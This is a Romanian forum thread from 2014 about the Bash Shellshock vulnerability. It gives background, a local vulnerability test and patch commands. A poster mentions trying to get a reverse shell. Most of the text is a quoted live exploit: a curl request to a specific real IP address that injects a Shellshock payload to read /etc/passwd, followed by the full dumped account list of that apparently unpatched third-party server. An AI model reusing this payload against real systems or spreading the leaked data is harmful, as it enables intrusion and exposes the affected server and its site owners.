pufosul 11 Report post Posted September 27, 2014 Dupa Heartbleed, urmeaza un nou exploit identificat se pare de echipa RedHat. Din cate am inteles e o problema de cod scris prost. Mai pe scurt cu exploitul asta poti castiga access root (un fel de admin) asupra unui server ce ruleaza o versiune de unix/linux, deci si cei care au Mac sunt afectati. Majoritatea serverelor web ruland pe Apache/nginx, routerelor care au o versiune de linux (openwrt,dd-wrt) e cam nasoala treaba. Ma intreb daca si routerele/switchurile Cisco, Juniper sunt afectate. Memento Mori Share this post Link to post Share on other sites
johnake 193 Report post Posted September 27, 2014 Trebuie menționat faptul că acest exploit poate fi activat numai pe sistemele care rulează servicii sau aplicații care permit userilor neautorizați accesarea/setarea prin remote a environment variables.Exemple de sisteme vulnerabile: Servere Apache care folosesc scripturi cgi care sunt scrise in Bash Anumiți clienți DHCP Servere OpenSSH care folosesc ForceCommand Servicii de networking vulernabile care folosesc Bash Mai multe detalii găsiți aici: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 și http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 Ce putem face în acest caz? Cum testăm sistemul pentru această vulnerabilitate? Scriem comanda asta în shell: env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test" Porțiunea : echo Bash is vulnerable! reprezintă marea bubă. Aici un potențial atacator poate injecta cod malițios. Așa că dacă în urma executării comenzii de mai sus outputul îți dă ceva în genul: Bash is vulnerable! Bash Test You're fucked! Just kidding! Există un patch, (cică nefinalizat) dar care rezolvă problema. Așa că faceți update la bash: APT-GET: sudo apt-get update && sudo apt-get install --only-upgrade bash YUM sudo yum update bash În legătură cu întrebarea ta pufosule, cred că trebuie întrebat la Cisco. Share this post Link to post Share on other sites
pufosul 11 Report post Posted September 27, 2014 Am testat pe serverele la munca. Au BASH 3.2, dar se pare ca nu e afectat. Am incercat sa obtin reverse shell Se pare ca urmatoarele deviceuri sunt afectate de la Cisco Cisco VCS devices (x7 and x8) Cisco MXE 3500 Cisco DMM and SNS (assuming since running Red Hat Enterprise but unable to verify) Jabber Guest TCS Endpoints (6 or below have been verified, unable to verify 7 but assume vulnerable) Cisco Conductor Au scos deja semnaturi pt IPS-uri. Un test pe un site care nu a fost patchuit inca. curl -i -X HEAD "http://85.114.145.159/" -A '() { :;}; echo "BashSmash: " $(</etc/passwd)' HTTP/1.1 301 Moved PermanentlyDate: Thu, 25 Sep 2014 08:08:31 GMTServer: ApacheBashBash: at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bashbin: x:1:1:bin:/bin:/bin/bashdaemon: x:2:2:Daemon:/sbin:/bin/bashftp: x:40:49:FTP account:/srv/ftp:/bin/bashgames: x:12:100:Games account:/var/games:/bin/bashhaldaemon: x:104:107:User for haldaemon:/var/run/hald:/bin/falselp: x:4:7:Printing daemon:/var/spool/lpd:/bin/bashmail: x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/falseman: x:13:62:Manual pages viewer:/var/cache/man:/bin/bashmessagebus: x:101:104:User for D-Bus:/var/run/dbus:/bin/falsenews: x:9:13:News system:/etc/news:/bin/bashnobody: x:65534:65533:nobody:/var/lib/nobody:/bin/bashntp: x:74:102:NTP daemon:/var/lib/ntp:/bin/falsepolkituser: x:103:106:PolicyKit:/var/run/PolicyKit:/bin/falsepostfix: x:51:51:Postfix Daemon:/var/spool/postfix:/bin/falseroot: x:0:0:root:/root:/bin/bashsuse-ncc: x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bashuucp: x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bashwwwrun: x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/falsenorplex: x:1000:100:norplex:/home/norplex:/bin/bashsmmsp: x:1001:1000::/home/smmsp:/bin/bashclamav: x:1002:1001:Clam AntiVirus:/home/clamav:/bin/falsemysql: x:1003:1002::/home/mysql:/bin/bashhttpd: x:1004:1003::/dev/local/httpd:/sbin/nologinsshd: x:1005:1004:sshd privsep:/var/empty:/bin/falsenagios: x:1006:1005::/usr/local/nagios:/bin/bashnolis: x:1008:100::/home/nolis:/bin/bashneuzeit: x:1011:1008::/www/vhtdocs/neuzeit:/bin/falsesehnde: x:1012:1009::/www/vhtdocs/sehnde:/bin/falseburgwedel: x:1013:1010::/www/vhtdocs/burgwedel:/bin/falseregioncelle: x:1014:1011::/www/vhtdocs/regioncelle:/bin/falsegronau: x:1015:1012::/www/vhtdocs/gronau:/bin/falseosterode: x:1016:1013::/www/vhtdocs/osterode:/bin/falseituelzen: x:1017:1014::/www/vhtdocs/ituelzen:/bin/falsecelle: x:1018:1015::/www/vhtdocs/celle:/bin/falsebuergertipps: x:1019:1016::/www/vhtdocs/buergertipps:/bin/falseobsburgwedel: x:1020:1017::/www/vhtdocs/obsburgwedel:/bin/falseschulausfall: x:1021:1018::/www/vhtdocs/schulausfall:/bin/falsecms: x:1022:1019::/www/vhtdocs/cms:/bin/falsehiller: x:1023:1020::/www/vhtdocs/hiller:/bin/falsesignotec: x:1024:1021::/www/vhtdocs/signotec:/bin/falsehiab: x:1025:1022::/www/vhtdocs/hiab:/bin/falsekyffhaeusernds: x:1026:1023::/www/vhtdocs/kyffhaeusernds:/bin/falsejugendosterode: x:1027:1024::/www/vhtdocs/jugendosterode:/bin/falsesaterland: x:1028:1025::/www/vhtdocs/saterland:/bin/falsebewerbung: x:1029:1026::/www/vhtdocs/bewerbung:/bin/falsecmsx: x:1030:1027::/www/vhtdocs/cmsx:/bin/falselkwittmund: x:1031:1028::/www/vhtdocs/lkwittmund:/bin/falsenolisde: x:1032:1029::/www/vhtdocs/nolisde:/bin/falsegrossenkn: x:1033:1030::/www/vhtdocs/grossenkn:/bin/falsebewerbungx: x:1034:1031::/www/vhtdocs/bewerbungx:/bin/falsebawn: x:1035:1032::/www/vhtdocs/bawn:/bin/falseemmebus: x:1036:1033::/www/vhtdocs/emmebus:/bin/falseemmebus01: x:1037:100::/home/emmebus01:/bin/falseemmebus02: x:1038:100::/home/emmebus02:/bin/falsebawnapp: x:1039:1034::/www/vhtdocs/bawnapp:/bin/falsehallewestfalen: x:1040:1035::/www/vhtdocs/hallewestfalen:/bin/falsebarsbuettel: x:1041:1036::/www/vhtdocs/barsbuettel:/bin/falsepfotennavigator: x:1042:1037::/www/vhtdocs/pfotennavigator:/bin/falsedietomate: x:1043:1038::/www/vhtdocs/dietomate:/bin/falseffosterode: x:1044:1039::/www/vhtdocs/ffosterode:/bin/falseffosterode01: x:1045:100::/home/ffosterode01:/bin/falsegoldschmiede: x:1046:1040::/www/vhtdocs/goldschmiede:/bin/falseloge: x:1047:1041::/www/vhtdocs/loge:/bin/falsekyffhaeusernds01: x:1048:100::/home/kyffhaeusernds01:/bin/falsewurzen: x:1049:1042::/www/vhtdocs/wurzen:/bin/falserwgleese: x:1050:1043::/www/vhtdocs/rwgleese:/bin/falserwgleese01: x:1051:100::/home/rwgleese01:/bin/falserwgleese02: x:1052:100::/home/rwgleese02:/bin/falserwgleese03: x:1053:100::/home/rwgleese03:/bin/falserwgleese04: x:1054:100::/home/rwgleese04:/bin/falserwgleese05: x:1055:100::/home/rwgleese05:/bin/falserwgleese06: x:1056:100::/home/rwgleese06:/bin/falserwgleese07: x:1057:100::/home/rwgleese07:/bin/falserwgleese08: x:1058:100::/home/rwgleese08:/bin/falserwgleese09: x:1059:100::/home/rwgleese09:/bin/falserwgleese10: x:1060:100::/home/rwgleese10:/bin/falsebrinkmann: x:1061:1044::/www/vhtdocs/brinkmann:/bin/falsebrinkmann01: x:1062:100::/home/brinkmann01:/bin/falsebrinkmann02: x:1063:100::/home/brinkmann02:/bin/falsetds: x:1064:1045::/www/vhtdocs/tds:/bin/falseiLocation: http://www.nolis.deContent-Type: text/html Luat de pe: http://0x4139.com/bashsmash-explained-what-does-the-vulnerability-mean-and-how-does-that-affect-you/ Iar un tip care scanase Internetul pentru servere problematice. Nu credeam ca vine ziua cand Windows Server va deveni mai stabil ca Linux Memento Mori Share this post Link to post Share on other sites